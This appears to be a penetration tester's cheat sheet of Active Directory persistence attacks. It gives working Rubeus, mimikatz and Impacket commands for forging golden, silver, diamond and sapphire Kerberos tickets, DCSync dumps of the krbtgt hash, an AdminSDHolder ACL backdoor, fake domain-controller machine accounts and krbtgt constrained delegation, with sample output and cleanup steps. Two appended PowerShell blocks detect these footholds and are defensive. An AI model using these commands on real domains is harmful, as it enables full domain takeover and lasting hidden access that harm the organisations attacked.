Silver Ticket
Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
$ getST.py megacorp.local/'SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator'
Golden Ticket
Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
$ ticketer.py -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/snovvcrash@DC01.megacorp.local -k -no-pass
$ secretsdump.py megacorp.local/snovvcrash@DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
Diamond Ticket
$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
Sapphire Ticket
$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -nthash <NT_HASH> -aesKey <AES_KEY> administrator
AdminSDHolder Modification
Create a Backdoor
Add a new domain user or grant an existing user GenericAll permissions on the AdminSDHolder container:
PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose
Check that granting AdminSDHolder permissions was successful (it may take 60+ minutes for the security ACLs to get updated for that user):
PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID :
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Now you can add yourself (the "snovvcrash" user) to the Domain Admins group at any time and do stuff (actually, adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyway after the backdoor user has been added to a protected group for the first time):
PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
admincount
----------
1
Remove the Backdoor
Disable or remove the account (if a new user was created):
PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del
Remove the user's ACE from the AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (it will be reset if the user is still granted rights on the AdminSDHolder container):
PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount
Fix the inheritance rules:
PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True # proceed if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False
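A defender's counterpart to the steps above, added here and not part of the original notes: it lists non-default full-control ACEs on AdminSDHolder and every account whose adminCount=1 (and blocked inheritance) outlived its protected-group membership. It assumes the RSAT ActiveDirectory module on a domain-joined host; the list of principals expected to hold full control is an assumption for a stock domain.

```powershell
# Added example, not part of the original notes: audit AdminSDHolder for backdoor ACEs
# and find accounts whose adminCount=1 / blocked inheritance outlived group membership.
# Assumes the RSAT ActiveDirectory module (AD: drive) on a domain-joined host.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$sdh    = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
$nb     = $domain.NetBIOSName

# Principals holding full control on AdminSDHolder by default (assumption: a stock
# domain; add known-good entries such as Exchange groups before relying on it).
$allowedFullControl = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                        "$nb\Domain Admins", "$nb\Enterprise Admins")

$acl = Get-Acl -Path "AD:\$sdh"
$suspiciousAces = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner' -and
    $allowedFullControl -notcontains $_.IdentityReference.Value
}

# Members of the groups SDProp protects, resolved recursively by well-known SID so the
# check does not depend on group names (forest-root-only groups are skipped silently
# in child domains).
$protectedSids = @('S-1-5-32-544','S-1-5-32-548','S-1-5-32-549','S-1-5-32-550',
                   'S-1-5-32-551','S-1-5-32-552') +
    (512,516,518,519,521,526,527 | ForEach-Object { "$($domain.DomainSID)-$_" })
$protectedMembers = foreach ($sid in $protectedSids) {
    Get-ADGroupMember -Identity $sid -Recursive -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty DistinguishedName
}

# adminCount=1 on an account that is in none of the protected groups is the trace a
# removed backdoor (or a past privileged membership) leaves behind.
$orphans = Get-ADUser -LDAPFilter '(&(adminCount=1)(!(sAMAccountName=krbtgt)))' |
    Where-Object { $protectedMembers -notcontains $_.DistinguishedName } |
    Select-Object SamAccountName, DistinguishedName,
        @{n='InheritanceBlocked'; e={ (Get-Acl -Path "AD:\$($_.DistinguishedName)").AreAccessRulesProtected }}

"Non-default full-control ACEs on AdminSDHolder:"
$suspiciousAces | Select-Object IdentityReference, ActiveDirectoryRights, IsInherited | Format-Table -AutoSize
"Accounts with adminCount=1 outside every protected group:"
$orphans | Format-Table -AutoSize
```

An orphan with InheritanceBlocked = True is exactly the state the "Fix the inheritance rules" steps above repair.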
SERVER_TRUST_ACCOUNT
When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set the SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 515 WORKSTATION_TRUST_ACCOUNT
2. Set the SERVER_TRUST_ACCOUNT bit:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 516 SERVER_TRUST_ACCOUNT
3. Perform DCSync:
$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
4. Clean up:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine
KRBTGT Constrained Delegation
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1$' -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01$'
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc
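A hunt for the two persistence primitives from the SERVER_TRUST_ACCOUNT and KRBTGT Constrained Delegation sections, added here and not part of the original notes: computer objects carrying SERVER_TRUST_ACCOUNT that are not real domain controllers, and any account allowed to delegate to the krbtgt service. It assumes the RSAT ActiveDirectory module on a domain-joined host.

```powershell
# Added example, not part of the original notes: find non-DC objects with the
# SERVER_TRUST_ACCOUNT bit and accounts with msDS-AllowedToDelegateTo pointing at krbtgt.
# Assumes the RSAT ActiveDirectory module on a domain-joined host.
Import-Module ActiveDirectory

# Ground truth for "is this really a DC": the computer objects behind the DC list.
$realDCs = (Get-ADDomainController -Filter *).ComputerObjectDN

# 1) SERVER_TRUST_ACCOUNT (0x2000 = 8192) set on an object that is not a known DC.
#    Setting the bit also flips primaryGroupID to 516, as the section above shows,
#    so both attributes are reported.
$fakeDCs = Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' `
        -Properties userAccountControl, primaryGroupID, whenChanged |
    Where-Object { $realDCs -notcontains $_.DistinguishedName }

# 2) Constrained delegation to the krbtgt service, with or without protocol
#    transition (TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000). A legitimate
#    msDS-AllowedToDelegateTo never names krbtgt.
$krbtgtDelegation = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=krbtgt/*)' `
        -Properties msDS-AllowedToDelegateTo, userAccountControl, whenChanged |
    Select-Object Name, DistinguishedName, whenChanged,
        @{n='SPNs';               e={ $_.'msDS-AllowedToDelegateTo' -join ',' }},
        @{n='ProtocolTransition'; e={ [bool]($_.userAccountControl -band 0x1000000) }}

"Computers with SERVER_TRUST_ACCOUNT that are not domain controllers:"
$fakeDCs | Select-Object Name, primaryGroupID, userAccountControl, whenChanged | Format-Table -AutoSize
"Accounts allowed to delegate to krbtgt:"
$krbtgtDelegation | Format-Table -AutoSize
```

Remediation for a hit is the cleanup the sections above already spell out: set userAccountControl back to 4096 and clear msDS-AllowedToDelegateTo, or delete the planted machine account.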